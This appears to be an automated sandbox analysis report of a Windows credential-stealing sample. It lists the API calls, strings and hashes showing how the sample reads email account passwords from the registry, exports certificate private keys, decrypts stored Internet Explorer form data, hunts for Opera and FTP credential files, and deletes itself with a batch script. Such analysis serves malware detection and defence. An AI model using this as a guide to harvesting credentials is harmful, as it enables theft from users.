4047fa 10057->10061 10058->10039 10063 4047d0 10059->10063 10064 404846 10060->10064 10068 401bcd 5 API calls 10060->10068 10062 404724 16 API calls 10061->10062 10065 404804 10062->10065 10067 401752 LocalFree 10063->10067 10067->10043 10088 407167 10087->10088 10094 406fa9 10087->10094 10088->8286 10089 406fb0 RegEnumKeyExA 10090 406fd9 RegCloseKey 10089->10090 10089->10094 10090->10088 10092 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10092->10094 10093 401b46 6 API calls 10093->10094 10094->10089 10094->10092 10094->10093 10095 401752 LocalFree 10094->10095 10096 406f89 11 API calls 10094->10096 10097 401548 lstrlen 10094->10097 10095->10094 10096->10094 10097->10094 10099 405fe5 10098->10099 10104 405e24 10098->10104 10099->8325 10100 405e2b RegEnumKeyExA 10101 405e54 RegCloseKey 10100->10101 10100->10104 10101->10099 10103 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10103->10104 10104->10100 10104->10103 10105 401b46 6 API calls 10104->10105 10106 401752 LocalFree 10104->10106 10107 401548 lstrlen 10104->10107 10108 405e01 11 API calls 10104->10108 10105->10104 10106->10104 10107->10104 10108->10104 10110 405d64 10109->10110 10118 405b8c 10109->10118 10110->8337 10111 405b93 RegEnumKeyExA 10112 405bbc RegCloseKey 10111->10112 10111->10118 10112->10110 10114 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10114->10118 10115 401b46 6 API calls 10115->10118 10116 401752 LocalFree 10116->10118 10117 401548 lstrlen 10117->10118 10118->10111 10118->10114 10118->10115 10118->10116 10118->10117 10164 405461 10119->10164 10165 401b46 6 API calls 10164->10165 10166 40547a 10165->10166 10167 401b46 6 API calls 10166->10167 10168 405490 10167->10168 10169 401b46 6 API calls 10168->10169 10170 4054a6 10169->10170 10171 401b46 6 API calls 10170->10171 10172 4054be 10171->10172 10173 401b46 6 API calls 10172->10173 10174 4054d4 10173->10174 10175 401b46 6 API calls 10174->10175 10177 4054ec 10175->10177 10176 401752 LocalFree 10178 405595 10176->10178 10182 401548 lstrlen 10177->10182 10198 405568 10177->10198 10179 401752 LocalFree 10178->10179 10180 40559d 10179->10180 10184 405523 10182->10184 10186 401548 lstrlen 10184->10186 10188 40552e 10186->10188 10190 401548 lstrlen 10188->10190 10198->10176 10200 406b21 10199->10200 10205 406954 10199->10205 10200->8376 10201 40695b RegEnumKeyExA 10202 406984 RegCloseKey 10201->10202 10201->10205 10202->10200 10204 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10204->10205 10205->10201 10205->10204 10206 401752 LocalFree 10205->10206 10207 401b46 6 API calls 10205->10207 10208 403ff9 2 API calls 10205->10208 10209 401548 lstrlen 10205->10209 10206->10205 10207->10205 10208->10205 10209->10205 10211 401d0b 2 API calls 10210->10211 10212 406bac 10211->10212 10213 406bb0 10212->10213 10214 406bb5 10212->10214 10213->8399 10215 401dd2 7 API calls 10214->10215 10216 406bc1 10215->10216 10226 406c61 10216->10226 10227 401769 LocalAlloc 10216->10227 10226->8399 10237 404aaf 10236->10237 10239 404aaa 10236->10239 10238 401752 LocalFree 10237->10238 10240 404c18 10238->10240 10239->10237 10241 404ac0 10239->10241 10242 404acf 10239->10242 10240->8439 10243 401bcd 5 API calls 10241->10243 10244 401bcd 5 API calls 10242->10244 10245 404acd 10243->10245 10244->10245 10246 404af3 FindFirstFileA 10245->10246 10246->10237 10247 404b12 10246->10247 10248 404b20 lstrcmpiA 10247->10248 10249 404b85 StrStrIA 10247->10249 10253 401bcd 5 API calls 10247->10253 10255 401c21 6 API calls 10247->10255 10257 404bc3 StrStrIA 10247->10257 10260 404bda 10247->10260 10251 404b37 lstrcmpiA 10248->10251 10258 404b32 10248->10258 10249->10247 10250 404be8 FindNextFileA 10249->10250 10250->10247 10252 404c02 FindClose 10250->10252 10251->10258 10252->10237 10253->10247 10254 401bcd 5 API calls 10254->10258 10255->10247 10256 401c21 6 API calls 10256->10258 10257->10247 10258->10250 10258->10254 10258->10256 10259 404a90 24 API calls 10258->10259 10263 401752 LocalFree 10258->10263 10259->10258 10262 401752 LocalFree 10260->10262 10275 404a79 10260->10275 10262->10250 10263->10258 10265 401c86 7 API calls 10264->10265 10266 404c31 10265->10266 10268 401bcd 5 API calls 10266->10268 10274 404c4c 10266->10274 10267 404a90 31 API calls 10269 404c5c 10267->10269 10270 404c43 10268->10270 10271 401752 LocalFree 10269->10271 10272 401752 LocalFree 10270->10272 10273 404c64 10271->10273 10272->10274 10273->8434 10274->10267 10276 403c89 16 API calls 10275->10276 10277 404a8c 10276->10277 10277->10260 10279 401c86 7 API calls 10278->10279 10280 4058c5 10279->10280 10288 403f6e 41 API calls 10287->10288 10289 4058a1 10288->10289 10290 403f6e 41 API calls 10289->10290 10291 4058b6 10290->10291 10291->8464 10293 407263 10292->10293 10299 4071d4 10292->10299 10293->8484 10294 4071db RegEnumValueA 10295 407204 RegCloseKey 10294->10295 10294->10299 10295->10293 10297 401b46 6 API calls 10297->10299 10298 401752 LocalFree 10298->10299 10299->10294 10299->10297 10299->10298 10301 401c86 7 API calls 10300->10301 10302 405a10 10301->10302 10303 405a62 10302->10303 10304 401c21 6 API calls 10302->10304 10303->8494 10305 405a1f 10304->10305 10306 403f6e 41 API calls 10305->10306 10307 405a35 10306->10307 10308 403f6e 41 API calls 10307->10308 10309 405a49 10308->10309 10310 403f6e 41 API calls 10309->10310 10311 405a5d 10310->10311 10312 401752 LocalFree 10311->10312 10312->10303 10314 401c86 7 API calls 10313->10314 10315 407620 10314->10315 10316 40765d 10315->10316 10317 401c21 6 API calls 10315->10317 10316->8513 10318 40762f 10317->10318 10319 403f6e 41 API calls 10318->10319 10320 407644 10319->10320 10321 403f6e 41 API calls 10320->10321 10322 407658 10321->10322 10323 401752 LocalFree 10322->10323 10323->10316 10325 407611 10324->10325 10330 4074ca 10324->10330 10325->8524 10326 4074d1 RegEnumKeyExA 10327 4074fa RegCloseKey 10326->10327 10326->10330 10327->10325 10329 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10329->10330 10330->10326 10330->10329 10331 401b46 6 API calls 10330->10331 10332 403f6e 41 API calls 10330->10332 10333 4074aa 45 API calls 10330->10333 10334 401752 LocalFree 10330->10334 10331->10330 10332->10330 10333->10330 10334->10330 10336 401c86 7 API calls 10335->10336 10337 404f45 10336->10337 10338 404fdc 10337->10338 10339 401bcd 5 API calls 10337->10339 10338->8541 10340 404f5d 10339->10340 10341 404e00 29 API calls 10340->10341 10342 404f6c 10341->10342 10343 401752 LocalFree 10342->10343 10344 404f71 10343->10344 10345 401bcd 5 API calls 10344->10345 10346 404f7e 10345->10346 10347 404e00 29 API calls 10346->10347 10348 404f8d 10347->10348 10349 401752 LocalFree 10348->10349 10350 404f92 10349->10350 10351 401bcd 5 API calls 10350->10351 10352 404f9f 10351->10352 10365 401b46 6 API calls 10364->10365 10367 404dda 10365->10367 10366 404dfc 10366->8551 10367->10366 10368 401752 LocalFree 10367->10368 10368->10366 10370 404e1a 10369->10370 10371 404e1f 10369->10371 10370->10371 10373 401bcd 5 API calls 10370->10373 10372 401752 LocalFree 10371->10372 10374 404f33 10372->10374 10375 404e2f 10373->10375 10374->8537 10393 404d9f 10375->10393 10378 401752 LocalFree 10379 404e3e 10378->10379 10380 401bcd 5 API calls 10379->10380 10381 404e4b 10380->10381 10382 404e62 FindFirstFileA 10381->10382 10382->10371 10383 404e81 10382->10383 10384 404f03 FindNextFileA 10383->10384 10385 404e8f lstrcmpiA 10383->10385 10384->10383 10386 404f1d FindClose 10384->10386 10387 404ea9 lstrcmpiA 10385->10387 10391 404ea7 10385->10391 10386->10371 10387->10391 10388 401bcd 5 API calls 10388->10391 10389 401c21 6 API calls 10389->10391 10390 404d9f 16 API calls 10390->10391 10391->10384 10391->10388 10391->10389 10391->10390 10392 401752 LocalFree 10391->10392 10392->10384 10394 403c89 16 API calls 10393->10394 10395 404db2 10394->10395 10395->10378 10397 401c86 7 API calls 10396->10397 10398 40c26c 10397->10398 10399 40c299 10398->10399 10400 401c21 6 API calls 10398->10400 10401 401c86 7 API calls 10399->10401 10402 40c27b 10400->10402 10404 40c2a1 10401->10404 10403 403dc3 41 API calls 10402->10403 10406 40c294 10403->10406 10405 40c2ce 10404->10405 10407 401c21 6 API calls 10404->10407 10405->8579 10408 401752 LocalFree 10406->10408 10409 40c2b0 10407->10409 10408->10399 10410 403dc3 41 API calls 10409->10410 10411 40c2c9 10410->10411 10412 401752 LocalFree 10411->10412 10412->10405 10414 401c86 7 API calls 10413->10414 10415 40c31f 10414->10415 10416 40c347 10415->10416 10417 401c21 6 API calls 10415->10417 10416->8595 10418 40c32e 10417->10418 10419 403f6e 41 API calls 10418->10419 10420 40c342 10419->10420 10421 401752 LocalFree 10420->10421 10421->10416 10423 40d7bc 10422->10423 10432 40d5fc 10422->10432 10423->8623 10424 40d603 RegEnumKeyExA 10425 40d62c RegCloseKey 10424->10425 10424->10432 10425->10423 10427 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10427->10432 10428 401b46 6 API calls 10428->10432 10429 40d5dc 11 API calls 10429->10432 10430 401752 LocalFree 10430->10432 10431 401548 lstrlen 10431->10432 10432->10424 10432->10427 10432->10428 10432->10429 10432->10430 10432->10431 10434 406f3c 10433->10434 10440 406d7e 10433->10440 10434->8629 10435 406d85 RegEnumKeyExA 10436 406dae RegCloseKey 10435->10436 10435->10440 10436->10434 10438 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 10438->10440 10439 401b46 6 API calls 10439->10440 10440->10435 10440->10438 10440->10439 10441 401752 LocalFree 10440->10441 10442 401548 lstrlen 10440->10442 10443 406d5e 11 API calls 10440->10443 10441->10440 10442->10440 10443->10440

                  Executed Functions

                  Function 0040F9DE Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 158stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetTickCount.KERNEL32 ref: 0040FA0B
                  • wsprintfA.USER32 ref: 0040FA19
                  • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,0040F9F2), ref: 0040FA79
                  • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,0040F9F2), ref: 0040FA8F
                  • lstrcat.KERNEL32(?,?), ref: 0040FAA3
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 0040FABC
                  • lstrcpy.KERNEL32(?,?), ref: 0040FAD3
                  • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 0040FADF
                  • lstrcpy.KERNEL32(00000001,?), ref: 0040FAED
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                  • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                  • API String ID: 629621046-4169620016
                  • Opcode ID: 2d4526de1fbfecd3fbb4542c10101f8a0fcd70485bed2be72a517248322137ac
                  • Instruction ID: f48094f2bf34160f77960da2a726bb2ff1328f347839c3ffb5de8ceac10d9150
                  • Opcode Fuzzy Hash: 2d4526de1fbfecd3fbb4542c10101f8a0fcd70485bed2be72a517248322137ac
                  • Instruction Fuzzy Hash: 64418230B44205BADF2976A19C13FAE7A67AF85704F20803EB215F62E1DEB94D545A1C
                  Function 0040E785 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E798
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040E7CC
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EA87
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                  • API String ID: 1332880857-2111798378
                  • Opcode ID: 1efb3267f2bb3610b73d164facee8bd75a0b0d5d416e8100a6d0dd2b11f23b77
                  • Instruction ID: 17efc9946458755bb64bf36a63b1628e6639bf8bc39f30ba5671466992181c26
                  • Opcode Fuzzy Hash: 1efb3267f2bb3610b73d164facee8bd75a0b0d5d416e8100a6d0dd2b11f23b77
                  • Instruction Fuzzy Hash: CF718331840118BBCF226F51CD42BDDBAB6BF04704F14C4BAB659750B1DB7A5BA1AF88
                  Function 0040CFA0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142encryptionstringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 202 40cfa0-40cfbe call 40156d 205 40d191-40d19f call 4015b3 202->205 206 40cfc4-40cfcb 202->206 206->205 208 40cfd1-40cfd8 206->208 208->205 210 40cfde-40cfe5 208->210 210->205 211 40cfeb-40cff2 210->211 211->205 212 40cff8-40cfff 211->212 212->205 213 40d005-40d00c 212->213 213->205 214 40d012-40d019 213->214 214->205 215 40d01f-40d033 CertOpenSystemStoreA 214->215 215->205 216 40d039 215->216 217 40d03b-40d049 CertEnumCertificatesInStore 216->217 218 40d050-40d05e 217->218 219 40d04b-40d18b CertCloseStore 217->219 221 40d181 218->221 222 40d064 218->222 219->205 221->217 223 40d177-40d17b 222->223 223->221 224 40d069-40d077 lstrcmp 223->224 225 40d171-40d174 224->225 226 40d07d-40d081 224->226 225->223 226->225 227 40d087-40d0af call 401769 call 4017a0 lstrcmp 226->227 232 40d0b5-40d0cc CryptAcquireCertificatePrivateKey 227->232 233 40d169-40d16c call 401752 227->233 232->233 234 40d0d2-40d0e4 CryptGetUserKey 232->234 233->225 236 40d0e6-40d0fd CryptExportKey 234->236 237 40d15e-40d163 CryptReleaseContext 234->237 238 40d155-40d158 CryptDestroyKey 236->238 239 40d0ff-40d122 call 401769 CryptExportKey 236->239 237->233 238->237 242 40d124-40d148 call 4014e6 call 40151c * 2 239->242 243 40d14d-40d150 call 401752 239->243 242->243 243->238
                  APIs
                  • CertOpenSystemStoreA.CRYPT32(00000000,0041377D), ref: 0040D026
                  • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D03F
                  • lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D070
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • lstrcmp.KERNEL32(?,0041378A), ref: 0040D0A8
                  • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D0C4
                  • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D0DC
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D0F5
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D11A
                  • CryptDestroyKey.ADVAPI32(?), ref: 0040D158
                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D163
                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D18B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                  • String ID: 2.5.29.37
                  • API String ID: 2649496969-3842544949
                  • Opcode ID: 90d45447d648ce5a9db7bc290ff7048b737502a1bb15dbf226a8ee68cf438de0
                  • Instruction ID: 7c639e010cdb965f3efc64817a9e83747879526ca5898d1d50ecab408f71e8b0
                  • Opcode Fuzzy Hash: 90d45447d648ce5a9db7bc290ff7048b737502a1bb15dbf226a8ee68cf438de0
                  • Instruction Fuzzy Hash: 52511731A00209FADF22ABA1DC09BEEBB75FB04345F108436F611791F4DB796994DB58
                  Function 00404A90 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107filestringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 250 404a90-404aa8 251 404aaa-404aad 250->251 252 404aaf 250->252 251->252 253 404ab4-404abe call 40237e 251->253 254 404c0d-404c19 call 401752 252->254 259 404ac0-404acd call 401bcd 253->259 260 404acf-404ad7 call 401bcd 253->260 264 404adc-404b0c call 401780 FindFirstFileA 259->264 260->264 264->254 267 404b12-404b1e 264->267 268 404b20-404b30 lstrcmpiA 267->268 269 404b85-404ba0 StrStrIA 267->269 272 404b32 268->272 273 404b37-404b4d lstrcmpiA 268->273 270 404ba2-404bc1 call 401bcd call 401c21 269->270 271 404be8-404bfc FindNextFileA 269->271 284 404bd0 270->284 285 404bc3-404bce StrStrIA 270->285 271->267 276 404c02-404c08 FindClose 271->276 272->271 274 404b54-404b83 call 401bcd call 401c21 call 404a90 call 401752 273->274 275 404b4f 273->275 274->271 275->271 276->254 287 404bd5-404bd8 284->287 285->287 289 404be3 call 401752 287->289 290 404bda-404bde call 404a79 287->290 289->271 290->289
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00404B00
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 00404B29
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00404B46
                  • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404BF5
                  • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404C08
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$.ini$Sites\$\*.*
                  • API String ID: 3040542784-999409347
                  • Opcode ID: c47b076886affc71d4b97aea9d9e2028b5f846fbe9e34eebce5f31f813dfcac2
                  • Instruction ID: 014027ab060015c7d8668547a98ec7e6f392db7afa0d1d618ff4209e3bbb5fca
                  • Opcode Fuzzy Hash: c47b076886affc71d4b97aea9d9e2028b5f846fbe9e34eebce5f31f813dfcac2
                  • Instruction Fuzzy Hash: FA3140B0940209AADF20BB61DC41FEA76B8AB84304F1045B7BA09B51F1D7BDDED09E5C
                  Function 0040421A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetVersionExA.KERNEL32(0000009C), ref: 00404263
                  • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004042E8
                  • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404311
                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004043C6
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004043E5
                  • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004043F5
                  • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404403
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                  • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                  • API String ID: 1787888500-92997708
                  • Opcode ID: cdb3d6fbab9e39f66c7821b3118941f5d0585d140dabf13a675d0ffb5a13bf06
                  • Instruction ID: ce2023bde6a4fb6ecb372171715b32991a17bfc6e2c9532a6d1893fd02629070
                  • Opcode Fuzzy Hash: cdb3d6fbab9e39f66c7821b3118941f5d0585d140dabf13a675d0ffb5a13bf06
                  • Instruction Fuzzy Hash: 76515170A40218BEEF216BA1CC42F9D7A75AF81348F1040BAB749790F1CBB94ED59F59
                  Function 004086C7 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0040871C
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 0040874F
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00408769
                  • StrStrIA.SHLWAPI(?,opera,00000000,00411EA8,?,00411EA6,?,00000000,?), ref: 004087AE
                  • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 004087DC
                  • FindClose.KERNEL32(?,?,?,00000000,?), ref: 004087EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*$opera$wand.dat
                  • API String ID: 3663067366-3278183560
                  • Opcode ID: 7aeb2c8a1a2e94ae6af49b6683e94d244e1474266b7b127cdedb6c7c130d2898
                  • Instruction ID: 557ed418c4cd54b267a256c148f0d4b8f8e25ee2e48a42878aee2fa7f092eeb5
                  • Opcode Fuzzy Hash: 7aeb2c8a1a2e94ae6af49b6683e94d244e1474266b7b127cdedb6c7c130d2898
                  • Instruction Fuzzy Hash: AD31507090021DAADF20AB61CD01FEE77B5AB14308F1044BBB548B61A1EBB99FC09F58
                  Function 00403DC3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00403E33
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 00403E60
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00403E7D
                  • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 00403F47
                  • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 00403F5A
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: b44ad3ce1885f3e95d41e77a56157922eba595f19b766e5f8d278ed35765075c
                  • Instruction ID: bfff32b9704a049f1e41c3d6a2529012e5f38b11855976b5e9acbc6b14058c4d
                  • Opcode Fuzzy Hash: b44ad3ce1885f3e95d41e77a56157922eba595f19b766e5f8d278ed35765075c
                  • Instruction Fuzzy Hash: 56413E3090020AAADF21AF61CC02FEA7F79AF04305F1045B7B909B51F1D7799B909A99
                  Function 0040A2F4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?), ref: 0040A2FE
                  • wsprintfA.USER32 ref: 0040A37D
                  • lstrlenW.KERNEL32(?,?), ref: 0040A3C3
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A406
                  • LocalFree.KERNEL32(00000000), ref: 0040A43D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                  • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • API String ID: 1926481713-2450551051
                  • Opcode ID: e543d0b0b507645461472ba9cc320ac6c87161f1aef8077e7e2bdd713baf0028
                  • Instruction ID: 260137c0291e22f6ba060bb8647dd68ce290b85e1b23a851725c006554f05f3d
                  • Opcode Fuzzy Hash: e543d0b0b507645461472ba9cc320ac6c87161f1aef8077e7e2bdd713baf0028
                  • Instruction Fuzzy Hash: 9C413C72C10218EBDF11AFA0DC06AEDBB79FF08318F14803AF910B51A1D7B99A55DB59
                  Function 00404E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00404E6F
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 00404E9E
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00404EB8
                  • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00404F10
                  • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00404F23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*
                  • API String ID: 3663067366-1173974218
                  • Opcode ID: 821db13aac8855ccce741e34619079f7ce0c089b5c8ac5f797a5545d8a7e2f9b
                  • Instruction ID: 6a67d0b90606cd11d2a3638aa92bbe6080bb9e2c124e64ba3ab12328cbcb17a4
                  • Opcode Fuzzy Hash: 821db13aac8855ccce741e34619079f7ce0c089b5c8ac5f797a5545d8a7e2f9b
